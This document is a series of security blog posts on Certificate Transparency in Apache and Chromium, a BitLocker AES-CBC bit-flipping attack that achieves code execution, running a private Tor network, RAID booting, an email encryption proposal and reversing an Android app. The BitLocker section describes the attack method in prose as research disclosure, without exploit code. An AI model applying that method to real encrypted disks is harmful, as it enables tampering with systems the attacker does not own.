This even goes so far as to install the module for you! Let's go configure it. I wanted to be able to control it with a startup flag, so where the modules were loaded I specified:


LoadModule ssl_ct_module modules/mod_ssl_ct.so

Now if you read the module documentation you discover this module does a lot. It uses the command line tools from the certificate-transparency project to automatically submit your certificates, it handles proxies, it does auditing... It's complicated. Instead, we want the simplest thing that works - so we're going to ignore all that functionality and just configure it statically using SCTs we give it ourselves.

~~I have two VHosts running (which actually caused a bug, pay attention to that if you have multiple VHosts)~~ - This is fixed! I configured it like this:


CTSCTStorage   /run/ct-scts

CTStaticSCTs /etc/apache2/ssl/rittervg-leaf.cer /etc/apache2/ssl/rittervg-scts
CTStaticSCTs /etc/apache2/ssl/cryptois-leaf.cer /etc/apache2/ssl/cryptois-scts

The CTSCTStorage directive is required, it's a working directory where it's going to store some temporary files. The CTStaticSCTs directive tells it look in this directory for files ending in .sct for SCTs for that certificate.

So we need to put our SCTs in that directory - but in what format? It's not really documented, but it's the exact SCT structure that's going to go into the extension. You'd think that structure would be documented in the RFC - in fact you'd probably expect it to be right here, where they say SerializedSCT... but no dice, that's not defined. Instead you can find it here but it's not really apparent. I figured it out mostly by reading Chromium's source code.

To aid you in producing these .sct files, I again wrote a little script. You give it the log name, the timestamp, and the signature that you got from the prior script you ran, and it outputs a small little binary file. (You can output it to a file, or output it in base64 for easy copy/pasting between terminals.)

With these .sct files present, you can fire up Apache (if necessary passing -D SSL_CT, perhaps in /etc/conf.d/apache) and see if it starts up! If it does, visit your site in Chrome (which will send the CT TLS Extension) and see if you can load your site. If you can, look in the Origin Information Bubble and see if you have transparency records:

Hopefully you do, and you can click in to see it:

"From an unknown log" appears because Rocketeer and Certly are still pending approval and inclusion

It's a known issue that you don't get the link or SCT viewer on Mac, but it will say "and is publicly auditable".

Requiring Certificate Transparency

That's all well and good and took way more work than you expected, but this only sends CT information, it doesn't require it. For that we need to go, edit, and compile another giant project: Chromium.

Wait seriously? You're going to go patch Chromium?

Hell yea. Like I said in the beginning: requiring CT, today, is a proof of concept of something from the future. We may get to the day where Chrome requires CT for all certificates - both EV and DV. But not yet, and not for several years at least. Today, we need to patch it. But rather than patching it to require CT for every domain on the internet - that would break, AFAIK, every single domain except my two and Digicert's test site - instead we're making it a directive in HSTS that a site operator can specify.

Building Chromium is not trivial. Unless you're on gentoo in which case it's literally how you install the browser. I worked off Chromium 42.0.2292.0 which is already out of date since I started this project 10 days ago. But whatever. I used the manual ebuild commands to pause between the unpack and compile stages to test my edits - unless you use that exact version, you'll almost certainly not get a clean apply of my patch.

The patch to chromium is over here, and it adds support for the HSTS directive requireCT. If present, it will fail a connection to any site that it has noted this for, unless it supplies SCTs in either the TLS Extension, the Certificate Extension, or an OCSP Staple. (The last two are untested, but probably work.)

Here's what it looks like when it fails:

And that, I think, is kinda cool.

Code Execution In Spite of BitLocker

8 Dec 2014 09:02:23 EST

Disk Encryption is “a litany of difficult tradeoffs and messy compromises” as our good friend and mentor Tom Ptacek put it in his blog post. That sounds depressing, but it’s pretty accurate - trying to encrypt an entire hard drive is riddled with constraints. For example:

Disk Encryption must be really, really fast. Essentially, if the crypto happens slower than the disk read speed (said another way, if the CPU is a bottleneck) - your solution is untenable to the mass market
It must support random read and write access - any sector may be read at any time, and any sector may be updated at any time
You really need to avoid updating multiple sectors for a single write - if power is lost during the operation, the inconsistencies will not be able to be resolved easily, if at all
People expect hard disks to provide roughly the amount of advertised space. Stealing significant amounts of space for ‘overhead’ is not feasible. (This goes doubly so if encryption is applied after operating system installation - there may not be space to steal!)

The last two constraints mean that the ciphertext must be the exact same size as the plaintext. There’s simply no room to store IVs, nonces, counters, or authentication tags. And without any of those things, there’s no way to provide cryptographic authentication in any of the common ways we know how to provide it. No HMACs over the sector and no room for a GCM tag (or OCB, CCM, or EAX, all of which expand the message). Which brings us to…

Poor-Man’s Authentication

Because of the constraints imposed by the disk format, it’s extremely difficult to find a way to correctly authenticate the ciphertext. Instead, disk encryption relies on ‘poor-man’s authentication’.

The best solution is to use poor-man’s authentication: encrypt the data and trust to the fact that changes in the ciphertext do not translate to semantically sensible changes to the plaintext. For example, an attacker can change the ciphertext of an executable, but if the new plaintext is effectively random we can hope that there is a far higher chance that the changes will crash the machine or application rather than doing something the attacker wants.

We are not alone in reaching the conclusion that poor-man’s authentication is the only practical solution to the authentication problem. All other disk-level encryption schemes that we are aware of either provide no authentication at all, or use poor-man’s authentication. To get the best possible poor-man’s authentication we want the BitLocker encryption algorithm to behave like a block cipher with a block size of 512–8192 bytes. This way, if the attacker changes any part of the ciphertext, all of the plaintext for that sector is modified in a random way.

That excerpt comes from an excellent paper by Niels Ferguson of Microsoft in 2006 explaining how BitLocker works. The property of changing a single bit, and it propagating to many more bits, is diffusion and it’s actually a design goal of block ciphers in general. When talking about disk encryption in this post, we’re going to use diffusion to refer to how much changing a single bit (or byte) on an encrypted disk affects the resulting plaintext.

BitLocker in Windows Vista & 7

When BitLocker was first introduced, it operated in AES-CBC with something called the Elephant Diffuser. The BitLocker paper is an excellent reference both on how Elephant works, and why they created it. At its heart, the goal of Elephant is to provide as much diffusion as possible, while still being highly performant.

The paper also includes Microsoft’s Opinion of AES-CBC Mode used by itself. I’m going to just quote:

Any time you want to encrypt data, AES-CBC is a leading candidate. In this case it is not suitable, due to the lack of diffusion in the CBC decryption operation. If the attacker introduces a change d in ciphertext block i, then plaintext block i is randomized, but plaintext block i + 1 is changed by d. In other words, the attacker can flip arbitrary bits in one block at the cost of randomizing the previous block. This can be used to attack executables. You can change the instructions at the start of a function at the cost of damaging whatever data is stored just before the function. With thousands of functions in the code, it should be relatively easy to mount an attack.

The current version of BitLocker [Ed: BitLocker in Vista and Windows 7] implements an option that allows customers to use AES-CBC for the disk encryption. This option is aimed at those few customers that have formal requirements to only use government-approved encryption algorithms. Given the weakness of the poor-man’s authentication in this solution, we do not recommend using it.

BitLocker in Windows 8 & 8.1

BitLocker in Windows 8 and 8.1 uses AES-CBC mode, without the diffuser, by default. It’s actually not even a choice, the option is entirely gone from the Group Policy Editor. (There is a second setting that applies to only “Windows Server 2008, Windows 7, and Windows Vista” that lets you choose Diffuser.) Even using the commandline there’s no way to encrypt a new disk using Diffuser - Manage-BDE says “The encryption methods aes128_Diffuser and aes256_Diffuser are deprecated. Valid volume encryption methods: aes128 and aes256.” However, we can confirm that the code to use Diffuser is still present - disks encrypted under Windows 7 with Diffuser continue to work fine on Windows 8.1.

AES-CBC is the exact mode that Microsoft considered (quoting from above) “unsuitable” in 2006 and “recommended against”. They explicitly said “it should be relatively easy to mount an attack”.

And it is.

As written in the Microsoft paper, the problem comes from the fact that an attacker can modify the ciphertext and perform very fine-grained modification of the resulting plaintext. Flipping a single bit in the ciphertext results reliably scrambles the next plaintext block in an unpredictable way (the rainbow block), and flips the exact same bit in the subsequent plaintext block (the red line):

This type of fine-grained control is exactly what Poor Man’s Authentication is designed to combat. We want any change in the ciphertext to result in entirely unpredictable changes in the plaintext and we want it to affect an extremely large swath of data. This level of fine-grained control allows us to perform targeted scrambling, but more usefully, targeted bitflips.

But what bits do we flip? If the disk is encrypted, don’t we lack any idea of where anything interesting is stored? Yes and no. In our testing, two installations of Windows 8 onto the same format of machine put the system DLLs in identical locations. This behavior is far from guarenteed, but if we do know where a file is expected to be, perhaps through educated guesswork and installing the OS on the same physical hardware, then we will know the location, the ciphertext, and the plaintext. And at that point, we can do more than just flip bits, we can completely rewrite what will be decrypted upon startup. This lets us do much more than what people have suggested around changing a branch condition: we just write arbitrary assembly code. So we did. Below is a short video that shows booting up a Virtual Machine showing a normal unmodified BitLockered disk on Windows 8, shutting it down and modifying the ciphertext on the underlying disk, starting it back up, and achieving arbitrary code execution.

Visit the Youtube Video

This is possible because we knew the location of a specific file on the disk (and therefore the plaintext), calculated what ciphertext would be necessary to write out desired shellcode, and wrote it onto the disk. (The particular file we chose did move around during installation, so we did ‘cheat’ a little - with more time investment, we could change our target to a system dll that hasn’t been patched in Windows Updates or moved since installation.) Upon decryption, 16 bytes were garbled, but we chose the position and assembly code carefully such that the garbled blocks were always skipped over. To give credit where others have demonstrated similar work, this is actually the same type of attack that Jakob Lell demonstrated against LUKS partitions last year.

XTS Mode

The obvious question comes up when discussing disk encryption modes: why not use XTS, a mode specifically designed for disk encryption and standardized and blessed by NIST? XTS is used in LUKS and Truecrypt, and prevents targeted bitflipping attacks. But it’s not perfect. Let’s look at what happens when we flip a single bit in ciphertext encrypted using XTS:

A single bit change completely scrambles the full 16 byte block of the ciphertext, there’s no control over the change. That’s good, right? It’s not bad, but it’s not as good as it could be. Unfortunately, XTS was not considered in the original Elephant paper (it was relatively new in 2006), so we don’t have their thoughts about it in direct comparison to Elephant. But the authors of Elephant evaluated another disk encryption mode that had the same property:

LRW provides some level of poor-man’s authentication, but the relatively small block size of AES (16 bytes) still leaves a lot of freedom for an attacker. For example, there could be a configuration file (or registry entry) with a value that, when set to 0, creates a security hole in the OS. On disk the setting looks something like “enableSomeSecuritySetting=1”. If the start of the value falls on a 16-byte boundary and the attacker randomizes the plaintext value, there is a 2⁻¹⁶ chance that the first two bytes of the plaintext will be 0x30 0x00 which is a string that encodes the ASCII value ’0’.

For BitLocker we want a block cipher whose block size is much larger.

Furthermore, they elaborate upon this in their comments to NIST on XTS, explicitly calling out the small amount of diffusion. A 16-byte scramble is pretty small. It’s only 3-4 assembly instructions. To compare how XTS’ diffusion compares to Elephant’s, we modified a single bit on the disk of a BitLockered Windows 7 installation that corresponded to a file of all zeros. The resulting output shows that 512 bytes (the smallest sector size in use) were modified:

This amount of diffusion is obviously much larger than 16 bytes. It’s also not perfect - a 512 byte scramble, in the right location, could very well result in a security bypass. Remember, this is all ‘Poor Man’s Authentication’ - we know the solution is not particularly strong, we’re just trying to get the best we can. But it’s still a lot harder to pop calc with.

Conclusion

From talking with Microsoft about this issue, one of the driving factors in this change was performance. Indeed, when BitLocker first came out and was documented, the paper spends a considerable amount of focus on evaluating algorithms based on cycles/byte. Back then, there were no AES instructions built into processors - today there are, and it has likely shifted the bulk of the workload for BitLocker onto the Diffuser. And while we think of computers as becoming more powerful since 2006 - tablets, phones, and embedded devices are not the ‘exception’ but a major target market.

Using Full Disk Encryption (including BitLocker in Windows 8) is clearly better than not - as anyone’s who had a laptop stolen from a rental car knows. Ultimately, I’m extremely curious what requirements the new BitLocker design had placed on it. Disk Encryption is hard, and even XTS (standardized by NIST) has significant drawbacks. With more information about real-world design constraints, the cryptographic community can focus on developing something better than Elephant or XTS.

I’d like to thank Kurtis Miller for his help with Windows shellcode, Justin Troutman for finding relevant information, Jakob Lell for beating me to it by a year, DaveG for being DaveG, and the MSRC.

This post originally appeared on the Cryptography Services blog.

Run Your Own Tor Network

17 Nov 2014 13:00:23 EST

Tor is interesting for a lot of reasons. One of the reasons it's interesting is that the network itself operates, at its core, by mutually distrusting Directory Authorities. These Directory Authorities are run by members of the Tor Project and by trusted outside individuals/groups, such as RiseUp.net and CCC.de. A Directory Authory votes on its view of the network, and collects the votes of the other Directory Authorities. If the majority of authorities vote for something (the inclusion of a relay, marking it as 'Bad', whatever) - it passes the vote.

This infrastructure design is very interesting. The only thing that comes close, that I can think of, is the Bitcoin blockchain or Ripple's ledgers. Compare it to some of the other models:

Relying on an individual to make trust decisions given a database of data and a little context. (Think PGP Web of Trust.)
Relying on a single party to sign everything and adjudicate. (Think country-code TLDs, or even Verisign operating .com)
Relying on a number of trusted parties who operate independently. (Think Certificate Authorities, any of whom can cerify any domain on the web.)
Relying on a single operator to run a service. (Think Whisper Systems' RedPhone/TextSecure/Signal.)

I think the Directory Authority model is pretty elegant. Relying on the user to make trust decisions doesn't work out so well. A single trusted server, or set of servers, administered by one organization is at risk to a complete compromise in one fell swoop. But seperately managed servers that operate in a majority vote mitigate many concerns.

If one were to take it a step further, one would ensure that no majority of the servers were running the same software stack, to reduce the possbility of a single bug affecting a majority. This is a poor example, because tor relies on OpenSSL and it's not easily swapped out - but the majority of DirAuths had to upgrade when Heartbleed hit. Going even further - there is only one implementation of the DirAuth voting protocol in the tor daemon itself. Certificate Transparency has at least two different implementations for comparison.

But, to be clear - locking a user into a trust decision, even a consensus of mutually distrusting authorities, is still a bad thing. If tor only allowed you to use the official Tor Network - that would be bad. We should be able to change who we trust at any time - Moxie dubs it Trust Agility. It's worth noting that the Tor Network has some amount of trust agility, but it's not perfect. If I want to change the Directory Authorities that I trust I can technically do so, but I will no longer be able to use the official Tor Network because those few thousand relays 'belong' to it, and one cannot set up a network that includes them. (There's been some thoughts that one might be able to, but it would be an unsupported hack, liable to break.) It would be interesting if the codebase could evolve such that a tor node may belong to more than one network at a time. Then an alternate network could flourish, and relay operators could join multiple networks to support other administrative boundaries.

Can I run a tor network?

Tor is open source. There aren't a lot of instructions for actually deploying the Directory Authorities, but what is there is not bad. And you can absolutely run your own tor network. There are actually three different ways to do it. Chutney and shadow are tools designed mostly for setting up test networks for running experiements in labratory conditions. Shadow is specifically designed for running bandwidth tests across large-sized tor networks. So if you want to model a tor network running 50,000 nodes - shadow's your huckleberry.

But if you want to deply an as-authentic tor network as possible, do it manually. It's not all that hard. And if you want to conduct research on tor's protocols, it's a great way to do it safely, instead of actively de-anonymizing real users in the wild. Here are the approxmate steps:

Configure and compile tor, as normal, on all your boxes.

If you're going to run multiple daemons per machine, you may want to use ./configure --prefix=/directory/tor-instance-1 to segment them.

Start configuring a few Directory Authorities.

This step is generating the keys for them and the DirServer lines. Run tor-gencert to generate an identity key. Then run tor --list-fingerprint. Create your DirServer lines like DirServer orport= v3ident= : . These DirServer lines are what put you onto an alternate tor network instead of the official one. You need one line per Directory Authority, and all DirServer lines need to be in the configuration of every DirAuth, Node, and Client you want to talk to this network.

Finish the Directory Authorites configuration.

You should set SOCKSPort to 0, ORPort to something, and DirPort to something.

You need to set AuthoritativeDirectory and V3AuthoritativeDirectory. You can also set VersioningAuthoritativeDirectory along with RecommendedClientVersions and RecommendedServerVersions - why not. Perhaps you want to copy ConsensusParams out of a recent consensus, also. If you're going to run multiple tor daemons off a single IP address, you should set AuthDirMaxServersPerAddr 0 (0 is unlimited, default is two servers per IP.)

You will also (probably) want to lower the voting times, so you can generate a consensus quicker. I'd suggest, to start off with, V3AuthVotingInterval 5 minutes, V3AuthVoteDelay 30 seconds, and V3AuthDistDelay 30 seconds . You can also set MinUptimeHidServDirectoryV2 to something like 1 hour.

Start up your Directory Authorities.

They should all be running, and you should see stuff like 'Time to vote' and 'Uploaded a vote to...' in the notices.log

You will also see Nobody has voted on the Running flag. Generating and publishing a consensus without Running nodes would make many clients stop working. Not generating a consensus! This is normal. If TestingAuthDirTimeToLearnReachability is not set (and it's not) - a Directory Authority will wait 30 minutes before voting to consider a relay to be Running. You should either wait 30 minutes and be patient, or set AssumeReachable to skip the 30 minute wait. They will shortly begin generating a consensus you can see at http://:/tor/status-vote/current/consensus

Start adding more nodes.

Configure some Exit and Relay nodes (and optionally Bridges). For each node, you will need to put the DirServer lines. If you're running your nodes in the same /16, you will also need to set EnforceDistinctSubnets 0.

There is one other thing you will need to set for the first few nodes though: AssumeReachable 1. This is because if the consensus has no Exit Nodes, a subtle bug will manifest, and nodes will get in a loop and will not upload their descriptors to the Directory Authorities for inclusion in the consensus. By setting AssumeReachable, we skip the test. (The other option is to set up one of your Directory Authorities as an Exit node.)

Run Depictor.

Depictor is a service that monitors the Directory Authorities and generates a pretty website that will give you a lot of info about your network. (Full disclosure, I wrote depictor, cutting over an older java-based tool called 'Doctor' to python)

At this point, you can add those DirServer lines to some clients and start sending traffic through your network. The only hard thing left is soliciting hundreds to thousands of relay operators to see the value in splitting from the official network to join yours. =)

Booting from RAID using GRUB2

28 Sep 2014 22:51:23 EST

Many moons ago, before Grub2 came about, I looked into booting from a RAID partition. It was possible, but quite difficult. Today it's possible, but only slightly difficult. I can't claim this blog post is 100% accurate, but these are my experiences, and if you got here via a search engine for a particular error, hopefully it will help guide you.

I started from a complete, working Gentoo installation on one hard drive comprised of the recommended 4 partitions - call it hard drive sda. I wanted to migrate this installation to a RAID-1 setup where there were two disks, four RAID partitions (md0, md1, md2, md3), in the same configuration. And, of course, boot from this RAID configuration. The second hard drive, blank, is sdb.

There are several players in the boot process, and you're going to need to cater to every one of them:

The GRUB Core Image
The GRUB Configuration
The Kernel Autodetection
The Kernel Configuration

Converting The System to RAID-1

You're going to need to do a lot of configuration, and then reboot, and hope it works. If it didn't work, you can safely back out of it, but reconfiguring will be a little tricky.

Follow this excellent tutorial. The gist of it is:

Replicate the partition structure of sda on sdb
Make sure the partition types are 0xFD
Create RAID arrays on each partition, with a missing disk, using the old superblock format. E.G.: mdadm --create /dev/md4 --level=1 --metadata=0.90 --raid-disks=2 missing /dev/sdb4
Create the correct filesystems (ext4 probably) on your /dev/md devices
Confirm /proc/mdstat, then mount all your RAID arrays in /mnt or somewhere
Copy your filesystems across using cp -axu / /mnt/md4 or such
Update your /etc/fstab
Don't reboot! You've got more work to do...

Configuring your Kernel

Make sure you've got the appropriate options enabled in your kernel. To be honest, I'm not sure exactly what options you need, but it's a safe bet you're going to need the options for your filesystem of choice (ext4?), hard drive, and RAID option compiled in . (That is, not a module.)

You will also need to cater to a couple of other whims of the kernel, which I mentioned above but did not explain. In more detail:

The kernel will attempt to auto-assemble RAID arrays when the parition type of 0xFD (or RAID Auto-Assemble). If the partition tpye is not 0xFD - you will have a bad time.
The kernel is only capable of assembling a RAID array if the superblock is type 0.9, also known as 'really really old' ref. Apparently, letting the kernel auto-asemble your RAID is deprecated ref - but I opted to let it do it anyway to avoid mucking with a initramfs.

GRUB

This part is going to be tricky. This post, which is not a tutorial, was the most helpful piece of information I found. Roughly speaking, what I did was:

Made sure (as much as I could be) that the grub core image had the modules I needed. I believe this is handled by adding GRUB_PRELOAD_MODULES="lvm diskfilter mdraid1x" to the end of /etc/defaut/grub. You should also make sure package.use contains sys-boot/grub:2 device-mapper mount sdl.

Ran (and read) grub2-mkconfig along with grub-probe-verbose and confirmed that it was detecting the current hard drive (sda) as the booting harddrive, when I wanted it to be the /dev/md devices. I copied it to grub2-mkconfig-fiddle and edited the following variables to be constants rather than queries to grub-probe.

GRUB_DEVICE="/dev/md4"      #root filesystem
GRUB_DEVICE_BOOT="/dev/md2" #boot partition

Generated the config file, and confirmed all the UUIDs by looking at ls /dev/disk/by-uuid and lsblk -o "NAME,UUID". I kept these around in a text file as it's easy to get confused about what UUIDs go where.

Finally ran grub2-install /dev/sdb. (I only ran this on sdb, see below for why).

An interesting item I found was that after you set up your RAID array, and it is by necessity degraded, you will get error messages ref. These error messages are the same ones you will get if your grub core image is missing the modules it needs. grub2-install: warning: Couldn't find physical volume `(null)'. Some modules may be missing from core image How can you tell if the error messages are because your core image is incorrect or the array is degraded? Who knows.

Now at this point, I shut the PC down, and unplugged the SATA cable that went to sda. You'll probably need to use smartctl -i to get the Serial Number of the drives so you know which is which. I didn't have to, but my logic was - if I bork this so much, I'll just replug it in and be back at square one. This was actually quite helpful, as I was able to switch my system between a working and non-working state. I also leaned heavily on a LiveCD while I worked through all the kinks. (While this blog post was presented linearly, my process was anything but.)

Cleanup

After you're successfully booting into your RAID, you'll need to shutdown, connect the second hard drive (sda), and boot. Cross your fingers your machine boots off sdb - if not, try changing the priority in BIOS. Once you're booting into your RAID partitions, add the sda[1-4] partitions to the appropriate RAIDs, change the partition types on sda to 0xFD, and remember to clean up the legacy grub installation on sda with grub2-install /dev/sda.

Finally - what's the point of RAID if it doesn't actually work when a hard drive dies. Shut down your computer and unplug sdb. Boot, and make sure it works. Shutdown, readd sdb, make sure the RAID recovery is done, then repeat for sda.

Other

I ran into a couple of other problems. Initially I didn't set the superblock format correctly the first time. I didn't look too hard, but I couldn't find a way to change the format in-place without wiping the array. So I wiped it, and re-copied it - it didn't pose a big problem to me in my situation.

Another was that after I got into the kernel, it hung at the line "Switched to clocksource tsc". This was, as far as I could tell, not related to the RAID stuff. If you google this, you'll find a ton of people having this problem, including a lot on Ubuntu. This thread solved the problem for me - I needed to enable CONFIG_DEVTMPFS_MOUNT in the kernel.

After I got it booted, something (probably my constant LiveCD-ing) had renamed my RAID arrays into md124, md125, md127, and md4. This annoyed me. I found a promising article, but alas it doesn't help when the superblock is 0.9 or when you need to rename the root filesystem that is mounted. The answer is actually in this answer under "Option #2" - you need to update the 'Preffered Minor' value.

Finally, during my testing, I pulled the cable to the sdb, and tried booting off just sda. I got a kernel panic in native_smp_send_reschedule - it took me a bit to remember what caused this error, as I had definrtly seen it before in my fiddling. This is the error you may get if your partition types are not set to 0xFD. After I fixed that, I was able to pull either cable and still boot.

After all that, I was (finally) good to go.

Universal Email Encryption Specification

27 Nov 2013 12:00:23 EST

Last May, I was in Hong Kong for OpenITP's Circumvention Tech Summit - and I ended up taking an afternoon walk with none other than Daniel Kahn Gillmor. Over a 7 hour and I-have-no-idea-how-many-kilometer walk, we talked about a ton of things, until I eventually asked him "Why don't you think we have email encryption?"

We talked about a lot of the hard problems of email encryption - problems that are difficult to solve while still being intutive and easy for non-technical users, and not disrupting their preferred workflow. Things like Key Discovery and Key Auththenticity, webmail, and moving keys between devices.

We were kind of beating around the bush, and finally I just said what we were both thinking: "Maybe providers should manage keys for most people." He agreed that this seemed like the best way to get wide adoption. (Remember, this was all pre-Snowden.)

We chatted some more, about key discovery in DNS (which would later be amended to HTTP), about encouraging email providers to do encryption on behalf of users, and more importantly (to us, as well as you I'm sure) - allowing users to manage their own keys and upload the public component.

What we saw was ubiquitous email encryption, where every email sent between major participating providers is encrypted. And in a large percentage of cases, it's encrypted provider-to-provider. But in a small percentage of cases - it's encrypted provider-to-end or end-to-end. We feel that if email encryption really was ubiquitous, the clients we have now (Enigmail, S/MIME in Outlook and so on) would be developed and promoted to first class citizens, and things like browser extension-based email encryption would be fleshed out considerably. So while the early adopters (the people who use email encryption today) would use the painful tools we have now - there'd be a huge investment in tool development, and .01% of users would grow to .1%, and then 1%, and maybe to 10%.

We laid out as many pieces as we could, specifying a key discovery mechanism that doesn't leak metadata, signaling information to learn if a provider (and user) has opted in to email encryption while blocking downgrade attacks, a report-only mode to prevent a flag day, a minimal level of key authenticity that can optionally be increased on a provider basis, failure reporting, enrollment steps for the many different ways email accounts are created on the web, and some suggestions for encrypted message format.

And then a few months later, a man named Edward Snowden came into our lives.

The PRISM revelations reveal widespread complicity on behalf of centralized email providers, but more importantly they reveal a broad overreach of the government, and the disturbing trend towards rule by secret law.

We still like this protocol, even post-Snowden. An encrypted email solution that requires end-to-end encryption, with no provision for an email provider to read the mail, is unlikely to be deployed by large corporations that have regulatory monitoring and reporting requirements - industries like large Law Firms, Financials, and Healthcare - plus all business that have to support E-Discovery and Data Loss Prevention. You may not like those things (and you may be morally opposed to them), but they are what companies require or have to live with. Those organizations could try to meet some of these requirements under an end-to-end encrypted e-mail scheme (for example, by operating key escrow services), but having direct cleartext access to their users' mail is technically much simpler. By making these use cases a standard, and making the feature as visible to mail users as https is to people who browse the web, we hoped to get large companies on board and have them share the initial development and deployment cost. We aimed for ubiquitous email encryption - business-to-business, between work email accounts and personal accounts. Yet another fragmented internet, where only a few of our contacts supported encryption, was no more interesting than the status quo.

But although we like it, the current situation in the US and the requirements placed upon (and cooperation of) large companies like Google and Verizon means that granting the provider a centralized place of trust in email encryption is a non-starter. And as a complicating factor, the thing the government has been most interested in has been metadata - the very thing that is afforded the least protection under the law and simultaneously the most difficult to protect in a point-to-point protocol. There are efforts to fight this technically (like Tor), but we feel the legal atmosphere must change as well as the technical infrastructure.

We're posting our specification and supporting documents online for people to refer to, in the public domain. It's over on github.. Email encryption is hard, and when you start thinking about all the corner cases (like automatically putting mailing list footers into a signed message) - it gets harder. We're hedging our bets. We hope that the legal atmosphere changes. Barring that, we hope this document and its appendixes help other people look at the problem and make progress where we got stalled.

Oh yea - what's it called? Well, when we walked around in Hong Kong, we were calling it "STEED-Like", after Werner Koch's STEED Proposal, which we drew inspiration from. When we realized how much we deviated from it, we dubbed it UEE for Universal Email Encryption - with the intention of finding a better name when we released it. But that day never came. So until we have a legal environment where this might make sense... pronounce is like wheeeeeeeee, but with a you in the front. YOU-EEEEEEEEEEEEEEEEEEEEEEEE!

The biggest argument we've seen against this proposal is that StartTLS (TLS-encrypted SMTP links between providers) gets you almost the same thing, for most users, with way less work. We love StartTLS and want to see it working way better than it does now. But we think that just getting to widespread email encryption (even if some or even most keys are provider-managed) would spur the development and smoothing out of client-based encryption, which would in turn let more people opt in to managing their own keys, getting true end-to-end security not possible with StartTLS.

Evernote, and Privacy Preserving Applications

14 Nov 2013 23:09:23 EST

I'd like to take a moment to talk about privacy preserving by default.

I don't intend for this to be a rant about current commercial decisions - instead I'd like it to be praise of what I think (and hope) is great design, and use it to try and set an example that other people can follow. I was talking with a friend recently, and he talked about how, ultimately, most people want personalization, they want ease of use, they want features from services and they're willing to give up their privacy in order to get those features. I don't disagree with either of his points - I agree with them entirely. But I challenge the assumption that getting those features, getting the ease of use requires giving up their data to a third party. And I instead pose the question: "If you can get the exact same feature, and it was provided in a privacy preserving way by say computing it locally on your phone - as opposed to bulk shipping your data out to a third party and having them analyze it on their servers. If you can get that exact same feature, I think everyone would prefer to get it in the privacy preserving way. So why not do that?"

Let's talk about a heart attack I had recently.

I use Evernote. Flame me, whatever, I'm not using it for work or for sensitive things, I'm using it for gift ideas I see in stores and simple things. If there was something I could run myself that had a shiny mobile app and a web UI, I'd use that but there isn't so let's move on. I took a photo, while I was at THREADS today, and when I went to add it in Evernote I got this screen:

Note, I recreated this with a quick shot of my laptop

How, in the hell, did it know I was at THREADS.

Was it doing some sort of geolocation combined with local events? I was so disturbed by this I searched for it: evernote smart title¹. This lead me to a blog post announcing the feature.

Now, when you create a new note and save it without giving the note a title, the app will assign a contextual title using calendar events, your location, note contents, and other information.

This is a great example of a totally legitimate, useful feature that most people (including myself) would like. Without it, I'm going to have to type what is likely to be a redundant title (as I'm only putting a few words to remind myself what I took a photo of), or have the title remain 'Untitled'. But as someone somewhat concerned about my privacy, it also filled me with dread. I knew there was two ways this was likely to be implemented. One would be to read my location and calendar locally, and generate a title. The other would be to bulk-ship my data up to their servers, analyze, and send back a pregenerated title. Let's see which they do.

I don't really intend for this to be an Android App Reversing Walkthrough, but I do want to cover what I had to go through to figure this out, because it's really not that hard and I think the community should be doing more of this to answer questions like "Hey, how the heck does [Flavor of the Week 'Secure' Message App Work]?" So I'm going to skip the 'easy' parts, and dig into the more difficult reversing. I'll point to Intrepidus Group and your search engine for getting you past the part where you pull the APK off the device, and run it through dex2jar. At this point, we've got a pile of decompiled java files. Let's dig in.

$ grep -R title *

This yields 810 results. Way too broad, let's try another tactic.

$ grep -R "Picture from" *

This yields no results. This made me a little nervous, because if the title was generated locally, I'd expect that string fragment to be found somewhere. New tactic. This data came from my calendar, so let's look at calendar API calls. Searching for a few API calls, I found a folder called 'smart/noteworthy'. The feature is called 'smart titles' so this may be it. But before I spend a ton of time reading the code, I can do more 'quick, dirty, and coarse' approaches that may get me nothing, or may get me a jackpot.

In fact, I realized I was omitting a key debugging tool: running the application while tailing logs with adb logcat.

I/EN      (26873): [NewNoteFragment] - canAttachFile()::mimeType=image/*
I/EN      (26873): [NewNoteFragment] - canAttachFile()result=true
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - generateAutoTitle()::title=null
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::5
D/EN      (26873): [a] - starting events query+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I/EN      (26873): [a] - Attachment()::uri=content://media/external/images/media/1764 mMimeType=image/jpeg type=0::mTitle=null
I/EN      (26873): [a] - findType()::type=4 mimeType=image/jpeg
I/EN      (26873): [a] - isSupportedUri()true
I/EN      (26873): [a] - Attachment()::mType=4mTitle=IMG_20131114_184957 mMetainfo=1 Mb mMimeType=image/jpeg
I/EN      (26873): [a] - Attachment()::mTitle=IMG_20131114_184957 mMetainfo=1 Mb
D/EN      (26873): [a] - events=1
D/EN      (26873): [ab] - isMultishotCameraAvailable: platform support = true Native library support = true
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - generateAutoTitle()::title=null
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::6
D/EN      (26873): [NewNoteFragment] - getAddress-running
I/ActivityManager( 1681): Displayed com.evernote/.note.composer.NewNoteAloneActivity: +373ms
D/EN      (26873): [ab] - isMultishotCameraAvailable: platform support = true Native library support = true
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - generateAutoTitle()::title=Picture from THREADS
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - generateAutoTitle()::title=Picture from THREADS
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - generateAutoTitle()::title=Picture from THREADS @ Town, State
D/EN      (26873): [NewNoteFragment] - showHelpDialog()

Now that is what I'm looking for. I locate that method, and it has code fragments like:

localObject2 = paramContext.getString(2131165339);
...
paramContext.getString(2131165687);

If you're a little familiar with Android, you probably realize this is something like context.getString(R.string.YOUR_STRING); but now it's been turned into a constant. Let's trace it down.

$ grep -R 2131165339 *
jad-ed/com/evernote/android/multishotcamera/R$string.java:  public static int untitled_note = 2131165339;
jad-ed/com/evernote/note/composer/a.java:              localObject2 = paramContext.getString(2131165339);
jad-ed/com/evernote/note/composer/p.java:      paramString = paramContext.getString(2131165339);
jad-ed/com/evernote/provider/a.java:            str2 = this.b.getString(2131165339);
jad-ed/com/evernote/ui/NewNoteFragment.java:        str1 = this.bl.getString(2131165339);
jad-ed/com/evernote/ui/NewNoteFragment.java:      str = b(2131165339);
